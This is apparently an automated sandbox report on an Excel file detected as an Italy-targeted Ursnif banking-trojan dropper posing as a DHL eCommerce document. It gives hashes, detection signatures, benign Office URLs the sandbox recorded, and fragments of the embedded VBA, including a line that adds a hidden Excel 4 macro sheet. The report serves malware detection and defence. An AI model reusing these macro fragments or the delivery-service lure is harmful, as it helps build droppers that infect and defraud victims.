Windows Analysis Report sample20211025-01.xls

Overview

General Information

Sample Name: sample20211025-01.xls
Analysis ID: 508537
MD5: 2172d539dfc31f78f87363c9837fc788
SHA1: a0af38a44615a87108f842cf32f5b5f8b289fe43
SHA256: 7116c93e85891626185692c325a7c648bf2f2effb5c05582f77a18144b620164
Detection

Ursnif Dropper
Score: 68
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found detection on Joe Sandbox Cloud Basic with higher score
Multi AV Scanner detection for submitted file
Detected Italy targeted Ursnif dropper document
Document contains an embedded VBA macro with suspicious strings
Document contains embedded VBA macros

Process Tree

  • System is w10x64
  • EXCEL.EXE (PID: 6844 cmdline: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding MD5: 5D6638F2C8F8571C593999C58866007E)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

AV Detection:

Multi AV Scanner detection for submitted file
Source: sample20211025-01.xls; Virustotal: Detection: 10%
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE; File opened: C:\Windows\SysWOW64\MSVCR100.dll
Source: excel.exe; Memory has grown: Private usage: 1MB later: 69MB

E-Banking Fraud:

Detected Italy targeted Ursnif dropper document
Source: Initial sample; OLE, VBA macro line: Ursnif specific tokens

System Summary:

Found detection on Joe Sandbox Cloud Basic with higher score
Source: sample20211025-01.xls; Joe Sandbox Cloud Basic: Detection: malicious, Score: 52, Threat Name: Ursnif Dropper
Document contains an embedded VBA macro with suspicious strings
Source: sample20211025-01.xls; OLE, VBA macro line: Excel4MacroSheets.Add(Before:=Worksheets((1))).Name = Ecco_la: l_esperienza
Source: sample20211025-01.xls; OLE, VBA macro line: ActiveSheet.Visible = 0
Source: sample20211025-01.xls; OLE indicator, VBA macros: true
Source: sample20211025-01.xls; Virustotal: Detection: 10%
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE; File created: C:\Users\user\AppData\Local\Temp\{E636E697-9D04-460D-8980-EAFBD79920B6} - OProcSessId.dat
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE; Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
Source: sample20211025-01.xls; OLE indicator, Workbook stream: true
Source: classification engine; Classification label: mal68.bank.expl.winXLS@1/1@0/0
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE; File read: C:\Users\desktop.ini
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE; File created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache
Source: Window Recorder; Window detected: More than 3 window changes detected
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE; Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE; File opened: C:\Windows\SysWOW64\MSVCR100.dll
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE; Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE; Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX

Mitre Att&ck Matrix

Initial Access: Valid Accounts | Default Accounts | Domain Accounts
Execution: Scripting11 | Scheduled Task/Job | At (Linux)
Persistence: Path Interception | Boot or Logon Initialization Scripts | Logon Script (Windows)
Privilege Escalation: Extra Window Memory Injection1 | Boot or Logon Initialization Scripts | Logon Script (Windows)
Defense Evasion: Masquerading1 | Scripting11 | Extra Window Memory Injection1
Credential Access: OS Credential Dumping | LSASS Memory | Security Account Manager
Discovery: File and Directory Discovery1 | System Information Discovery2 | Query Registry
Lateral Movement: Remote Services | Remote Desktop Protocol | SMB/Windows Admin Shares
Collection: Data from Local System | Data from Removable Media | Data from Network Shared Drive
Exfiltration: Exfiltration Over Other Network Medium | Exfiltration Over Bluetooth | Automated Exfiltration
Command and Control: Data Obfuscation | Junk Data | Steganography
Network Effects: Eavesdrop on Insecure Network Communication | Exploit SS7 to Redirect Phone Calls/SMS | Exploit SS7 to Track Device Location
Remote Service Effects: Remotely Track Device Without Authorization | Remotely Wipe Data Without Authorization | Obtain Device Cloud Backups
Impact: Modify System Partition | Device Lockout | Delete Device Data

Behavior Graph


Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source | Detection | Scanner
sample20211025-01.xls | 11% | Virustotal

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs


Domains and IPs

Contacted Domains

No contacted domains info

URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
https://api.diagnosticssdf.office.com | D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.dr | false | | high
https://login.microsoftonline.com/ | D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.dr | false | | high
https://shell.suite.office.com:1443 | D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.dr | false | | high
https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize | D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.dr | false | | high
https://autodiscover-s.outlook.com/ | D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.dr | false | | high
https://roaming.edog. | D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.dr | false | URL Reputation: safe | unknown
https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr | D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.dr | false | | high
https://cdn.entity. | D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.dr | false | URL Reputation: safe | unknown
https://api.addins.omex.office.net/appinfo/query | D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.dr | false | | high
https://clients.config.office.net/user/v1.0/tenantassociationkey | D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.dr | false | | high
https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/ | D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.dr | false | | high
https://powerlift.acompli.net | D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.dr | false | URL Reputation: safe | unknown
https://rpsticket.partnerservices.getmicrosoftkey.com | D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.dr | false | URL Reputation: safe | unknown
https://lookup.onenote.com/lookup/geolocation/v1 | D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.dr | false | | high
https://cortana.ai | D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.dr | false | URL Reputation: safe | unknown
https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech | D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.dr | false | | high
https://cloudfiles.onenote.com/upload.aspx | D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.dr | false | | high
https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile | D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.dr | false | | high
https://entitlement.diagnosticssdf.office.com | D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.dr | false | | high
https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy | D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.dr | false | | high
https://api.aadrm.com/ | D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.dr | false | URL Reputation: safe | unknown
https://ofcrecsvcapi-int.azurewebsites.net/ | D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.dr | false | URL Reputation: safe | unknown
https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies | D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.dr | false | | high
https://api.microsoftstream.com/api/ | D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.dr | false | | high
https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive | D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.dr | false | | high
https://cr.office.com | D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.dr | false | | high
https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h | D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.dr | false | Avira URL Cloud: safe | low
https://portal.office.com/account/?ref=ClientMeControl | D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.dr | false | | high
https://graph.ppe.windows.net | D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.dr | false | | high
https://res.getmicrosoftkey.com/api/redemptionevents | D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.dr | false | URL Reputation: safe | unknown
https://powerlift-frontdesk.acompli.net | D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.dr | false | URL Reputation: safe | unknown
https://tasks.office.com | D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.dr | false | | high
https://officeci.azurewebsites.net/api/ | D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.dr | false | URL Reputation: safe | unknown
https://sr.outlook.office.net/ws/speech/recognize/assistant/work | D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.dr | false | | high
https://store.office.cn/addinstemplate | D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.dr | false | URL Reputation: safe | unknown
https://api.aadrm.com | D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.dr | false | URL Reputation: safe | unknown
https://outlook.office.com/autosuggest/api/v1/init?cvid= | D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.dr | false | | high
https://globaldisco.crm.dynamics.com | D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.dr | false | | high
https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech | D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.dr | false | | high
https://dev0-api.acompli.net/autodetect | D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.dr | false | URL Reputation: safe | unknown
https://www.odwebp.svc.ms | D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.dr | false | URL Reputation: safe | unknown
https://api.powerbi.com/v1.0/myorg/groups | D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.dr | false | | high
https://web.microsoftstream.com/video/ | D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.dr | false | | high
https://api.addins.store.officeppe.com/addinstemplate | D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.dr | false | Avira URL Cloud: safe | unknown
https://graph.windows.net | D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.dr | false | | high
https://dataservice.o365filtering.com/ | D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.dr | false | URL Reputation: safe | unknown
https://officesetup.getmicrosoftkey.com | D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.dr | false | URL Reputation: safe | unknown
https://analysis.windows.net/powerbi/api | D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.dr | false | | high
https://prod-global-autodetect.acompli.net/autodetect | D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.dr | false | URL Reputation: safe | unknown
https://outlook.office365.com/autodiscover/autodiscover.json | D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.dr | false | | high
https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios | D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.dr | false | | high
https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech | D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.dr | false | | high
https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json | D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.dr | false | | high
https://ncus.contentsync. | D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.dr | false | URL Reputation: safe | unknown
https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false | D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.dr | false | | high
https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/ | D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.dr | false | | high
http://weather.service.msn.com/data.aspx | D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.dr | false | | high
https://apis.live.net/v5.0/ | D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.dr | false | URL Reputation: safe | unknown
https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks | D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.dr | false | | high
https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios | D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.dr | false | | high
https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml | D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.dr | false | | high
https://management.azure.com | D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.dr | false | | high
https://outlook.office365.com | D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.dr | false | | high
https://wus2.contentsync. | D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.dr | false | URL Reputation: safe | unknown
https://incidents.diagnostics.office.com | D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.dr | false | | high
https://clients.config.office.net/user/v1.0/ios | D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.dr | false | | high
https://insertmedia.bing.office.net/odc/insertmedia | D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.dr | false | | high
https://o365auditrealtimeingestion.manage.office.com | D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.dr | false | | high
https://outlook.office365.com/api/v1.0/me/Activities | D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.dr | false | | high
https://api.office.net | D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.dr | false | | high
https://incidents.diagnosticssdf.office.com | D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.dr | false | | high
https://asgsmsproxyapi.azurewebsites.net/ | D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.dr | false | URL Reputation: safe | unknown
https://clients.config.office.net/user/v1.0/android/policies | D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.dr | false | | high
https://entitlement.diagnostics.office.com | D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.dr | false | | high
https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json | D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.dr | false | | high
https://substrate.office.com/search/api/v2/init | D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.dr | false | | high
https://outlook.office.com/ | D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.dr | false | | high
https://storage.live.com/clientlogs/uploadlocation | D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.dr | false | | high
https://outlook.office365.com/ | D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.dr | false | | high
https://webshell.suite.office.com | D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.dr | false | | high
https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive | D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.dr | false | | high
https://substrate.office.com/search/api/v1/SearchHistory | D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.dr | false | | high
https://management.azure.com/ | D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.dr | false | | high
https://login.windows.net/common/oauth2/authorize | D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.dr | false | | high
https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile | D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.dr | false | URL Reputation: safe | unknown
https://graph.windows.net/ | D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.dr | false | | high
https://api.powerbi.com/beta/myorg/imports | D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.dr | false | | high
https://devnull.onenote.com | D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.dr | false | | high
https://ncus.pagecontentsync. | D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.dr | false | URL Reputation: safe | unknown
https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json | D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.dr | false | | high
https://messaging.office.com/ | D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.dr | false | | high
https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile | D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.dr | false | | high
https://augloop.office.com/v2 | D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.dr | false | | high
https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing | D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.dr | false | | high
https://skyapi.live.net/Activity/ | D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.dr | false | URL Reputation: safe | unknown
https://clients.config.office.net/user/v1.0/mac | D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.dr | false | | high
https://dataservice.o365filtering.com | D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.dr | false | URL Reputation: safe | unknown
https://api.cortana.ai | D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.dr | false | URL Reputation: safe | unknown
https://onedrive.live.com | D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.dr | false | | high
https://ovisualuiapp.azurewebsites.net/pbiagave/ | D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.dr | false | URL Reputation: safe | unknown

Contacted IPs

No contacted IP infos

General Information

Joe Sandbox Version: 33.0.0 White Diamond
Analysis ID: 508537
Start date: 25.10.2021
Start time: 10:49:32
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 3m 56s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: sample20211025-01.xls
Cookbook file name: defaultwindowsofficecookbook.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Run name: Potential for more IOCs and behavior
Number of analysed new started processes analysed: 24
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal68.bank.expl.winXLS@1/1@0/0
EGA Information: Failed
HDC Information: Failed
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 0
                                                                                                                                                • Number of non-executed functions: 0
                                                                                                                                                Cookbook Comments:
                                                                                                                                                • Adjust boot time
                                                                                                                                                • Enable AMSI
                                                                                                                                                • Found application associated with file extension: .xls
                                                                                                                                                • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                                                                                • Attach to Office via COM
                                                                                                                                                • Active Picture Object
                                                                                                                                                • Active Picture Object
                                                                                                                                                • Scroll down
                                                                                                                                                • Close Viewer
                                                                                                                                                Warnings:
                                                                                                                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, SgrmBroker.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
                                                                                                                                                • Excluded IPs from analysis (whitelisted): 23.211.4.86, 52.109.20.75, 52.109.12.21, 52.109.88.37, 20.82.209.183, 40.91.112.76, 20.54.110.249, 40.112.88.60, 80.67.82.235, 80.67.82.211, 20.50.102.62
                                                                                                                                                • Excluded domains from analysis (whitelisted): displaycatalog-rp-uswest.md.mp.microsoft.com.akadns.net, prod-w.nexus.live.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, wus2-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, a1449.dscg2.akamai.net, arc.msn.com, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, nexus.officeapps.live.com, arc.trafficmanager.net, consumer-displaycatalogrp-aks2aks-uswest.md.mp.microsoft.com.akadns.net, officeclient.microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, prod.configsvc1.live.com.akadns.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, e1723.g.akamaiedge.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, ris.api.iris.microsoft.com, config.officeapps.live.com, us.configsvc1.live.com.akadns.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                                                                                                                                                 • Not all processes were analyzed, report is missing behavior information

                                                                                                                                                Simulations

                                                                                                                                                Behavior and APIs

                                                                                                                                                No simulations

                                                                                                                                                Joe Sandbox View / Context

                                                                                                                                                IPs

                                                                                                                                                No context

                                                                                                                                                Domains

                                                                                                                                                No context

                                                                                                                                                ASN

                                                                                                                                                No context

                                                                                                                                                JA3 Fingerprints

                                                                                                                                                No context

                                                                                                                                                Dropped Files

                                                                                                                                                No context

                                                                                                                                                Created / dropped Files

                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\D996E009-EEFC-4DD9-8747-5D20986EEBA9
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                File Type:XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):139130
                                                                                                                                                Entropy (8bit):5.358455742213455
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:1536:NcQIfgxrBdA3gBwfnQ9DQW+zBY34Fi7nXboOidXVE6LWmE9:XWQ9DQW+zzXaH
                                                                                                                                                MD5:DF73792F5988E451A9F9A3FFD4853113
                                                                                                                                                SHA1:97AB67B8DAE208FFBF7B4ECE1B590D439B86FF95
                                                                                                                                                SHA-256:6F24C0FFC4CC4AB3CD7B6FD668F23591CE6FE680BD92EA41660358E956AD7142
                                                                                                                                                SHA-512:13072E1620D7D6A892C88588BC5EF48C4EB41D3C013DC2DED6889A6D66802BD05A55B83A9C503DD2566571B1B43F8FC849240536A57C50F61D0A01D16497E3C8
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:low
                                                                                                                                                Preview: <?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2021-10-25T08:50:24">.. Build: 16.0.14618.30527-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientHome">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientTemplate">.. <o:url>https://ocsa.office.microsoft.com/client/15/help/template</o:url>.. </o:service>.. <o:

                                                                                                                                                Static File Info

                                                                                                                                                General

                                                                                                                                                File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Create Time/Date: Mon Oct 25 08:52:46 2021, Last Saved Time/Date: Mon Oct 25 08:52:48 2021, Security: 0, Author: DHL eCommerce
                                                                                                                                                Entropy (8bit):5.70676744685002
                                                                                                                                                TrID:
                                                                                                                                                • Microsoft Excel sheet (30009/1) 78.94%
                                                                                                                                                • Generic OLE2 / Multistream Compound File (8008/1) 21.06%
                                                                                                                                                File name:sample20211025-01.xls
                                                                                                                                                File size:57344
                                                                                                                                                MD5:2172d539dfc31f78f87363c9837fc788
                                                                                                                                                SHA1:a0af38a44615a87108f842cf32f5b5f8b289fe43
                                                                                                                                                SHA256:7116c93e85891626185692c325a7c648bf2f2effb5c05582f77a18144b620164
                                                                                                                                                SHA512:3ac78cb0976a0125e1b05b36bdbd347827d07ed840dddc4e20c325fde80bef5bbb25f558d23424a93ad97c4f980a85af45bfd7a039d711c4eb0f7bbf4389ac79
                                                                                                                                                SSDEEP:1536:GsQlYkEIbSkKBEqEXPgsRZmbaoFhZhR0cixIHm0w05bQK/64f6xMmsi0wW6l:GhlYkEIuPm3fNRZmbaoFhZhR0cixIHmp
                                                                                                                                                File Content Preview:........................>...................................F..................................................................................................................................................................................................

                                                                                                                                                File Icon

                                                                                                                                                Icon Hash:74ecd4c6c3c6c4d8

                                                                                                                                                Static OLE Info

                                                                                                                                                General

                                                                                                                                                Document Type:OLE
                                                                                                                                                Number of OLE Files:1

                                                                                                                                                OLE File "sample20211025-01.xls"

                                                                                                                                                Indicators

                                                                                                                                                Has Summary Info:True
                                                                                                                                                Application Name:unknown
                                                                                                                                                Encrypted Document:False
                                                                                                                                                Contains Word Document Stream:False
                                                                                                                                                Contains Workbook/Book Stream:True
                                                                                                                                                Contains PowerPoint Document Stream:False
                                                                                                                                                Contains Visio Document Stream:False
                                                                                                                                                Contains ObjectPool Stream:
                                                                                                                                                Flash Objects Count:
                                                                                                                                                Contains VBA Macros:True

                                                                                                                                                Summary

                                                                                                                                                Code Page:1252
                                                                                                                                                Author:DHL eCommerce
                                                                                                                                                Create Time:2021-10-25 07:52:46.061000
                                                                                                                                                Last Saved Time:2021-10-25 07:52:48
                                                                                                                                                Security:0

                                                                                                                                                Document Summary

                                                                                                                                                Document Code Page:1252
                                                                                                                                                Thumbnail Scaling Desired:False
                                                                                                                                                Company:
                                                                                                                                                Contains Dirty Links:False
                                                                                                                                                Shared Document:False
                                                                                                                                                Changed Hyperlinks:False
                                                                                                                                                Application Version:1048576

                                                                                                                                                Streams with VBA

                                                                                                                                                VBA File Name: Foglio1, Stream Size: 992
                                                                                                                                                General
                                                                                                                                                Stream Path:_VBA_PROJECT_CUR/VBA/Foglio1
                                                                                                                                                VBA File Name:Foglio1
                                                                                                                                                Stream Size:992
                                                                                                                                                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . - . . . . . . . . . . . . . . . . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                Data Raw:01 16 03 00 00 f0 00 00 00 d2 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff d9 02 00 00 2d 03 00 00 00 00 00 00 01 00 00 00 db f6 f5 9d 00 00 ff ff 23 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                VBA Code
                                                                                                                                                Attribute VB_Name = "Foglio1"
                                                                                                                                                Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                                                                                                                                                Attribute VB_GlobalNameSpace = False
                                                                                                                                                Attribute VB_Creatable = False
                                                                                                                                                Attribute VB_PredeclaredId = True
                                                                                                                                                Attribute VB_Exposed = True
                                                                                                                                                Attribute VB_TemplateDerived = False
                                                                                                                                                Attribute VB_Customizable = True
                                                                                                                                                VBA File Name: Questa_cartella_di_lavoro, Stream Size: 5922
                                                                                                                                                General
                                                                                                                                                Stream Path:_VBA_PROJECT_CUR/VBA/Questa_cartella_di_lavoro
                                                                                                                                                VBA File Name:Questa_cartella_di_lavoro
                                                                                                                                                Stream Size:5922
                                                                                                                                                Data ASCII:. . . . . . . . . 2 . . . . . . . . . . . ` . . . n . . . . . . . . . . . . . . . . . . . . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . p . . . . . . . . . . ~ . H . . [ . . . . . . . . . . . . . . . . . . . . F . . . . . . . . . . . . . . . . . . . . . D . . . W . M . . . = . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . D . . . W . M . . . = . . . . . . . . . ~ . H . . [ . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                Data Raw:01 16 03 00 06 00 01 00 00 32 0b 00 00 e4 00 00 00 10 02 00 00 60 0b 00 00 6e 0b 00 00 de 12 00 00 0e 00 00 00 01 00 00 00 db f6 f5 c7 00 00 ff ff 23 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff 70 00 ff ff 00 00 18 c9 7f a3 ee 7e 08 48 9e f3 5b 96 bf be 15 c1 19 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                VBA Code
                                                                                                                                                Attribute VB_Name = "Questa_cartella_di_lavoro"
                                                                                                                                                Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
                                                                                                                                                Attribute VB_GlobalNameSpace = False
                                                                                                                                                Attribute VB_Creatable = False
                                                                                                                                                Attribute VB_PredeclaredId = True
                                                                                                                                                Attribute VB_Exposed = True
                                                                                                                                                Attribute VB_TemplateDerived = False
                                                                                                                                                Attribute VB_Customizable = True
                                                                                                                                                Public Function Mali_i(R As String, S As Long) As Variant
